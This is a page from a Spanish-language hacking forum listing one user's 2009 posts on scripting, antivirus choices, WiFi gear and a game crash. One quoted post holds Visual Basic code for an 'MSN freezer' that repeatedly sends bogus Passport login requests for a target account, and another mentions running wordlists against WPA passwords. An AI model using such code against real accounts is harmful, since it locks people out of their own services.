elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Trabajando con las ramas de git (tercera parte)


  Mostrar Mensajes
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13
111  Foros Generales / Sugerencias y dudas sobre el Foro / Re: cuanto va a durar el motivo navideño ? ^^ en: 16 Enero 2009, 01:39 am
mmmm.... yo queria militares perno no habia en la opcion entonces puse cowboy  :xD
112  Programación / Scripting / Re: Script backup BAT con 4 archivos de historial en: 15 Enero 2009, 22:49 pm
Ahora yo me imagino muchas formas (mal depuradas por eso no pongo) para solucionar pero no entro aun en el contexto.

Mira podes hacer por ejemplo %variable:~-2% que muestra los 2 ultimos carcteres...


Ah... muestra en pantalla! el archivo a borrar! o sea todo facil como lo muestra? Ya que hay una funcion en u thread con chincheta como guardar en una variable la ip que tira ipconfig.
113  Programación / Programación Visual Basic / Re: Compilacion de Congelador MSN. en: 14 Enero 2009, 23:46 pm
Hola amigos de elhacker.net, queria saludarles y a la vez mostrarles mi aprendisaje.
Bueno este codigo fuente es:

Código
  1. Public Class Form1
  2.    Private Sub Command1_Click()
  3.    On Error Resume Next
  4.    Winsock1.Connect("login.passport.com", 80)
  5.    Timer1.Enabled = True
  6.    End Sub
  7.  
  8.  
  9.    Private Sub Timer1_Timer()
  10.    On Error Resume Next
  11.    Winsock1.SendData("GET /login2.srf HTTP/1.0" & vbCrLf)
  12.    Winsock1.SendData("Accept: */*" & vbCrLf)
  13.    Winsock1.SendData("Authorization: Passport1.4 OrgVerb=GET,OrgURL=http%3A%2F%2Fmessenger%2Emsn%2Ecom,sign-in=" + Text1.Text + ",pwd=FREEZED-BY-WHK,lc=1033,id=507,tw=40,fs=1,ru=http%3A%2F%2Fmessenger%2Emsn%2Ecom,ct=1131803266,kpp=1,kv=7,ver=2.1.6000.1,rn=Oyx2lzO3,tpf=a9aa21fdbc1350435849d9fd05849cb7" & vbCrLf)
  14.    Winsock1.SendData(vbCrLf)
  15.    Winsock1.SendData(vbCrLf)
  16.    End Sub
  17.  
  18.  
  19.    Private Sub Command2_Click()
  20.    On Error Resume Next
  21.    Timer1.Enabled = False
  22.    Winsock1.Close()
  23.    End Sub

El caso es que en este experimento que estado haciendo sobre los congeladores del msn queria que calificaceis mi avance, y que me ayudaran a encontrar donde esa el problema de este codigo.

Saludos y  muchas gracias por la atencion !


Que aprendiste a hacer "copy and paste"...
El codigo es super re contra mega sencillo... para empeorar esta en visual basic que te ayuda todo cuando tenes un misero error.
114  Seguridad Informática / Materiales y equipos / Re: Diccionarios en: 13 Enero 2009, 10:40 am
Cain y Abel ya viene con su worldlist y tambien ya viene con la funcion de ejecutarlo a una contraseña WPA
115  Seguridad Informática / Materiales y equipos / Re: Conexión USB 5V 42A para la alfa en: 13 Enero 2009, 10:39 am
Me gusto la idea, te simplifica las cosas al conectar un multi.

Pero lo que mas me interesa es el equipito de musica el como y el porque esta...
116  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Separar el foro de bugs y exploits en dos en: 11 Enero 2009, 05:03 am
La idea es buena. Yo tambien la apoyo :P
117  Media / Juegos y Consolas / Re: |SOLUCIONADO|error| Call of duty 5 World at War en: 10 Enero 2009, 15:32 pm
Hola tengo el cod5 original y lo ejecuto y me activa cuenta y demas y cuando empieza a cargar el mapa se queda parado y me dice que call of duty world at war  a encontrado un problema y debe cerrarse, tengo todos los requisitos ya que estoy un año jugando al cod4, alguien puede ayudarme?

      GRACIAS.

Podrias hacer otro thread para esto.

Bueno, cuando aparece? cuando dice hace un click para continuar? o cuando?
Y si reinstalar windows o el COD5?
118  Seguridad Informática / Seguridad / Re: Nueva encuesta: Mejor Antivirus en: 5 Enero 2009, 08:50 am
Mi respuesta es ninguno. Porque de todos los que nombraron todos me traicionaron en detecciones delirantes o deteccion y no eliminacion (ya que el virus se tiraba un heal XD) o nula deteccion.

El mejor antivirus es ser cuidadoso. Quitar el autorun automatico, eliminar con algun batch el virus del pen, desconfiar de lo que descargas, saber que todos los procesos que tenes activos, etc.
Otra solucion es pasarse a linux (algo que estoy haciendo MUY lentamente).





119  Programación / Scripting / Re: Comentar!! en: 5 Enero 2009, 03:43 am

Y porque al final me dice como por ejemplo:

Thank you very much for use EXTREME'S Vaati

Yo no soy tuyo!!
:xD :xD :xD "Thank you very much for use EXTREME'S %var1%"
var1 es la variable que almacena el nombre que te pide al principio del script
"set /p var1= Tell me your name??"
xD

Si si yo ya me di cuenta leyendo el codigo ya que aun no probe el codigo ethe en mi pc.
120  Programación / Scripting / Re: Comentar!! en: 5 Enero 2009, 02:41 am
Worm???

Que es eso!!!!!???? Es un simple codigo que es creado por este batch que ni siquiera lo ejecuta (y tampoco pide a windows que lo ejecute). Eso no puede llamarse worm!!! o si?  :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes: :rolleyes:

Y porque al final me dice como por ejemplo:

Thank you very much for use EXTREME'S Vaati

Yo no soy tuyo!!
Páginas: 1 2 3 4 5 6 7 8 9 10 11 [12] 13
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines